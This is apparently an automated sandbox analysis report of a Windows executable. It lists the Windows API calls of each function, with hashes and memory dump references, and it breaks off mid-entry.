• Instruction ID: aea9d63627e202933d8ac4c6cad7c964b34c473e1f77024d29d81bfc1069fbec
• Opcode Fuzzy Hash: 11c611a566f6cd60f6ca4cad85dc4867506d66b11241b25e540668e5f726788d
• Instruction Fuzzy Hash: 6FD09E72920128BB9B009A89DC41DF7775DDB19760F44401AF90497141C1B4AC5197E4
APIs
• FindNextFileA.KERNEL32(000000FF,?,00000000,0045386F,?,00000000,004538D9,?,?,-00000001,00000000,?,0047B861,00000000,0047B7B0,00000000), ref: 0045384B
• FindClose.KERNEL32(000000FF,00453876,0045386F,?,00000000,004538D9,?,?,-00000001,00000000,?,0047B861,00000000,0047B7B0,00000000,00000001), ref: 00453869
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: Find$CloseFileNext
• String ID:
• API String ID: 2066263336-0
• Opcode ID: ce33a9adc91091840db89c3f0b9d0ab62a3048a172c241aa17054621e5542f77
• Instruction ID: 9ec0e3c397c6f5708f2a232916c112a37fe27e538a562d44e8698fe4f4711445
• Opcode Fuzzy Hash: ce33a9adc91091840db89c3f0b9d0ab62a3048a172c241aa17054621e5542f77
• Instruction Fuzzy Hash: AA81B37090424D9FCF11EF65C8417EFBBB4AF4934AF1480AAE84067392D3399B4ACB58
APIs
• GetACP.KERNEL32(?,?,00000001,00000000,0047CC8B,?,-0000001A,0047EBEA,-00000010,?,00000004,0000001A,00000000,0047EF37,?,0045D288), ref: 0047CA22
  • Part of subcall function 0042E244: 73A0A570.USER32(00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A), ref: 0042E253
  • Part of subcall function 0042E244: EnumFontsA.GDI32(?,00000000,0042E230,00000000,00000000,0042E29C,?,00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000), ref: 0042E27E
  • Part of subcall function 0042E244: 73A0A480.USER32(00000000,?,0042E2A3,00000000,00000000,0042E29C,?,00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000), ref: 0042E296
• SendNotifyMessageA.USER32(00010440,00000496,00002711,-00000001), ref: 0047CBF2
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: A480A570EnumFontsMessageNotifySend
• String ID:
• API String ID: 2685184028-0
• Opcode ID: f68c4743a9de9405453e6a0390fbdfcde8eff5ac8737c06096cd16648cf5d8d5
• Instruction ID: fce8b5d73ed99f1e2ef66d4a8ce886950ac346dadb3b378a3b6f7676f451f25a
• Opcode Fuzzy Hash: f68c4743a9de9405453e6a0390fbdfcde8eff5ac8737c06096cd16648cf5d8d5
• Instruction Fuzzy Hash: 585172346001048BC720EF26E9C668B3799EB54309B50C57FB8489B7A7C73CED468B9E
APIs
• RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DC60), ref: 0042DB64
• RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DC60), ref: 0042DBD4
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
• Opcode ID: f6dee5a1b0912d590274e0c641160928bd3a3525fab59aba2a017e3bac49ea5e
• Instruction ID: dfb8c8f379aef3e71039058fa16673b54f7d2a66c5b8750361213b9ce9dda202
• Opcode Fuzzy Hash: f6dee5a1b0912d590274e0c641160928bd3a3525fab59aba2a017e3bac49ea5e
• Instruction Fuzzy Hash: E6416371E04129AFDB11DF96D881BAFB7B8EB44704F91846AE800F7244D778EE00DB95
APIs
• RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DEFE,?,?,00000008,00000000,00000000,0042DF2B), ref: 0042DE94
• RegCloseKey.ADVAPI32(?,0042DF05,?,00000000,00000000,00000000,00000000,00000000,0042DEFE,?,?,00000008,00000000,00000000,0042DF2B), ref: 0042DEF8
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: CloseEnum
• String ID:
• API String ID: 2818636725-0
• Opcode ID: c20ec2cbd5f7473bb618f7593d98c9f52b2147fe6f3bae42fe9bdb37577d9e65
• Instruction ID: 371203d48d58dd12687a59eda9429109c9bfccb849147f5bab4b3e409d052118
• Opcode Fuzzy Hash: c20ec2cbd5f7473bb618f7593d98c9f52b2147fe6f3bae42fe9bdb37577d9e65
• Instruction Fuzzy Hash: F431D570F04648AEDB11DFA6DD42BBFBBB8EB49304F91407BE500B7280D6789E01CA19
APIs
• VirtualAlloc.KERNEL32(00000000,00600000,00002000,00000001,?,?), ref: 0045CF34
• BZ2_bzDecompressInit._ISDECMP(?,00000000,00000000,?,?,?,00000000,00600000,00002000,00000001,?,?), ref: 0045CF7A
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: AllocDecompressInitVirtualZ2_bz
• String ID:
• API String ID: 3582128297-0
• Opcode ID: 939ddee8e7cb809407a1460aba98dbeb0dddb04131a165e363d28bd3e230a3f5
• Instruction ID: 1a4503516ee109fc6ad3b2554e9268a8a2595667017840414d64b8ef7de05fed
• Opcode Fuzzy Hash: 939ddee8e7cb809407a1460aba98dbeb0dddb04131a165e363d28bd3e230a3f5
• Instruction Fuzzy Hash: D0110872600700BFD310CF258982B96BBA6FF44751F044127E908D7681E7B9A928CBD8
APIs
• FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AFF2
• FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B14F,00000000,0040B167,?,?,?,00000000), ref: 0040B003
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: Resource$FindFree
• String ID:
• API String ID: 4097029671-0
• Opcode ID: c217acbb35f958402dd645ed5001c515fa2723f58848c5696583f56f37880200
• Instruction ID: 91321923317e208a88a5ae6d58faa7c91e6d3ee961cd2f37f7af0eb3e2dea987
• Opcode Fuzzy Hash: c217acbb35f958402dd645ed5001c515fa2723f58848c5696583f56f37880200
• Instruction Fuzzy Hash: A401DFB1300604AFD710FF69DC92E5B77A9DB8A7187118076F500AB6D0DA7AAC1096AD
APIs
• MoveFileA.KERNEL32(00000000,00000000), ref: 00452322
• GetLastError.KERNEL32(00000000,00000000,00000000,00452348), ref: 0045232A
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: ErrorFileLastMove
• String ID:
• API String ID: 55378915-0
• Opcode ID: 835ec9a5b672ab9d24676a9d11d134ae0c37e22a40a15be47d608805de694f62
• Instruction ID: cd5642aef6cf07d7f8e9267465b44b1c19008dc4a29441b527747bf004e73304
• Opcode Fuzzy Hash: 835ec9a5b672ab9d24676a9d11d134ae0c37e22a40a15be47d608805de694f62
• Instruction Fuzzy Hash: 0301F971B04744BBCB00DFB99D415AEB7ECDB4932575045BBFC08E3252EA7C5E088598
APIs
• CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00451E2F), ref: 00451E09
• GetLastError.KERNEL32(00000000,00000000,00000000,00451E2F), ref: 00451E11
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
• Opcode ID: b7dd327be7f8f9d4ff98a7d49d2b4008869c573d79d3003604c7202f4093979a
• Instruction ID: 865e03444c10a102779f68a5f284ef85491b61924e311ce2fbbb44c68c5af0ec
• Opcode Fuzzy Hash: b7dd327be7f8f9d4ff98a7d49d2b4008869c573d79d3003604c7202f4093979a
• Instruction Fuzzy Hash: 03F0C871A04604ABCB10DF759C4269EB7E8DB49315B5049B7FC04E7652E63D5E088598
APIs
• DeleteFileA.KERNEL32(00000000,00000000,00451FC5,?,-00000001,?), ref: 00451F9F
• GetLastError.KERNEL32(00000000,00000000,00451FC5,?,-00000001,?), ref: 00451FA7
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: DeleteErrorFileLast
• String ID:
• API String ID: 2018770650-0
• Opcode ID: 3d1044f5e2d2d648e0667ff4a971c8bbcfba219cc637320a536d75e9382e69c7
• Instruction ID: 56c29436b3704a60aac7ef2d45938277689dd37fb147f6dcc6f0601c7006ef02
• Opcode Fuzzy Hash: 3d1044f5e2d2d648e0667ff4a971c8bbcfba219cc637320a536d75e9382e69c7
• Instruction Fuzzy Hash: 59F0C872A04644ABCB00DF75AC416AEB7E8DB4831575149B7FC04E3262E7385E189598
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,0045219F,?,?,00000000), ref: 00452179
                                                                                            • GetLastError.KERNEL32(00000000,00000000,0045219F,?,?,00000000), ref: 00452181
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesErrorFileLast
                                                                                            • String ID:
                                                                                            • API String ID: 1799206407-0
                                                                                            • Opcode ID: 6d4dbdae4b422f7f8bb4bc8d57743dba2f11a1c7441bfab1e9d389b7cfb9d745
                                                                                            • Instruction ID: 62be775e20b856c612f09eeab74c149225b5b58071cf0ad503393caa7686f059
                                                                                            • Opcode Fuzzy Hash: 6d4dbdae4b422f7f8bb4bc8d57743dba2f11a1c7441bfab1e9d389b7cfb9d745
                                                                                            • Instruction Fuzzy Hash: 2BF02870A04B08ABDB10DF759C414AEB3E8EB4572571047B7FC14A3282D7785E088588
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0045CEF2), ref: 0045D046
                                                                                            Strings
                                                                                            • bzlib: Too much memory requested, xrefs: 0045D021
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID: bzlib: Too much memory requested
                                                                                            • API String ID: 4275171209-1500031545
                                                                                            • Opcode ID: c63733ee34ed6dcfa19a3ccb32caffce73538764a075bf8867a72a68987aa30e
                                                                                            • Instruction ID: abed268314e6f1e5b27342288b91a972118d83a3dc427804377a042ebfa3a805
                                                                                            • Opcode Fuzzy Hash: c63733ee34ed6dcfa19a3ccb32caffce73538764a075bf8867a72a68987aa30e
                                                                                            • Instruction Fuzzy Hash: 87F030327001114BDB6199A988C17DA66D48F8875EF080476AF4CDF28BD6BDDC89C36C
                                                                                            APIs
                                                                                            • LoadCursorA.USER32(00000000,00007F00), ref: 00423259
                                                                                            • LoadCursorA.USER32(00000000,00000000), ref: 00423283
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CursorLoad
                                                                                            • String ID:
                                                                                            • API String ID: 3238433803-0
                                                                                            • Opcode ID: f8ffac14a906f8b64a7fc8a6c8ab7a97eb5bbf96c971544edaeb3bf4604a13a0
                                                                                            • Instruction ID: 4bac6b1dd1e4bc4155aef89283820d70f6b19f6d084946fd63ee35bdac132fa3
                                                                                            • Opcode Fuzzy Hash: f8ffac14a906f8b64a7fc8a6c8ab7a97eb5bbf96c971544edaeb3bf4604a13a0
                                                                                            • Instruction Fuzzy Hash: 0BF05C11700110ABDA105D3E6CC0E2A7268DB82B36B6103BBFE3AD32D1CA2E1D01017D
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLibraryLoadMode
                                                                                            • String ID:
                                                                                            • API String ID: 2987862817-0
                                                                                            • Opcode ID: 99dd2043f999db4e1414a2a3c1f7d5ac1e6fec7ec7d1cd9244d10c1b93de06db
                                                                                            • Instruction ID: 1f7e49cd896e1bdba9cb1c47732ae581670473b421036b970d27c02fb23a5fd1
                                                                                            • Opcode Fuzzy Hash: 99dd2043f999db4e1414a2a3c1f7d5ac1e6fec7ec7d1cd9244d10c1b93de06db
                                                                                            • Instruction Fuzzy Hash: ACF05E70614744BEDB029F679C6282ABAECE74DB1179248BAF800A7691E63D58108928
                                                                                            APIs
                                                                                            • GetClassInfoA.USER32(00400000,?,?), ref: 004162F1
                                                                                            • GetClassInfoA.USER32(00000000,?,?), ref: 00416301
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassInfo
                                                                                            • String ID:
                                                                                            • API String ID: 3534257612-0
                                                                                            • Opcode ID: 95fcc31a687e8085c8d51d7c5e8386a7ebbc1e12afa0a833ee919d12e52ce4aa
                                                                                            • Instruction ID: 0adfc10981bdfd058f0d6bb489ac923dd3d4ff6eaebe16c9951958678d3e783c
                                                                                            • Opcode Fuzzy Hash: 95fcc31a687e8085c8d51d7c5e8386a7ebbc1e12afa0a833ee919d12e52ce4aa
                                                                                            • Instruction Fuzzy Hash: 50E01AB26025256AEB10DFA98D81EE32ADCDB09310B120263BE04CA286D764DD009BA8
                                                                                            APIs
                                                                                            • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,0046F12D,0000003C,00000000), ref: 0044FF6E
                                                                                            • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,0046F12D,0000003C,00000000), ref: 0044FF76
                                                                                              • Part of subcall function 0044FD14: GetLastError.KERNEL32(0044FB30,0044FDD6,?,00000000,?,004962F0,00000001,00000000,00000002,00000000,00496451,?,?,00000005,00000000,00496485), ref: 0044FD17
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 1156039329-0
                                                                                            • Opcode ID: e054c5ccee6c1196755840a7a8baca4f528d5ae0d9a30f87e7f7972c64a6d300
                                                                                            • Instruction ID: 1dbdaa83cb3dbbf4f1378df278a55a8d47ec78cb15146b3f417e0b56a3c3e3df
                                                                                            • Opcode Fuzzy Hash: e054c5ccee6c1196755840a7a8baca4f528d5ae0d9a30f87e7f7972c64a6d300
                                                                                            • Instruction Fuzzy Hash: E2E012B13056015BFB00EAA599C1F3B22D8DB49314F10487BB544CF182E674CC098B65
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$AllocLock
                                                                                            • String ID:
                                                                                            • API String ID: 15508794-0
                                                                                            • Opcode ID: 3aab631d28e9500c64151c0aeb9b91af43aad549cba5a5fa87d1f146672bdb4f
                                                                                            • Instruction ID: 0263706b80ae8aebac4b2aeda69df254121a1764ed820e2db5cbcbfbef09bb73
                                                                                            • Opcode Fuzzy Hash: 3aab631d28e9500c64151c0aeb9b91af43aad549cba5a5fa87d1f146672bdb4f
                                                                                            • Instruction Fuzzy Hash: 3D9002C4C10B01A4DC0432B24C0BC3F0C2CD8C072C3C0486F7018B6183883C8800083C
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual$AllocFree
                                                                                            • String ID:
                                                                                            • API String ID: 2087232378-0
                                                                                            • Opcode ID: 86d3033056ee1eeb69ed56595d455cb9815cc57517e3e671329daeadf9e1ec36
                                                                                            • Instruction ID: b33c25bc9d44e5855224c25112d8485d4e2e4d0ac397fdc44bd3a0d1e7be2c31
                                                                                            • Opcode Fuzzy Hash: 86d3033056ee1eeb69ed56595d455cb9815cc57517e3e671329daeadf9e1ec36
                                                                                            • Instruction Fuzzy Hash: 3BF08272A0063067EB60596A4C85B5359C49BC5794F154076FD09FF3E9D6B98C0142A9
                                                                                            APIs
                                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,0040871A), ref: 00408603
                                                                                              • Part of subcall function 00406DF4: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E11
                                                                                              • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                            • String ID:
                                                                                            • API String ID: 1658689577-0
                                                                                            • Opcode ID: 0c0846f6018fb18ca9a233b5544f45ce7783ff452534d63f167772a199f0b751
                                                                                            • Instruction ID: 93f846491c188cfa0342f854d2ed9f3c57c1d7a82097d89a8732084db8b3b420
                                                                                            • Opcode Fuzzy Hash: 0c0846f6018fb18ca9a233b5544f45ce7783ff452534d63f167772a199f0b751
                                                                                            • Instruction Fuzzy Hash: 11314375E001199BCF00DF95C8819DEB7B9FF84314F15857BE815AB286E738AE058B98
                                                                                            APIs
                                                                                            • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC49
                                                                                            Memory Dump Source
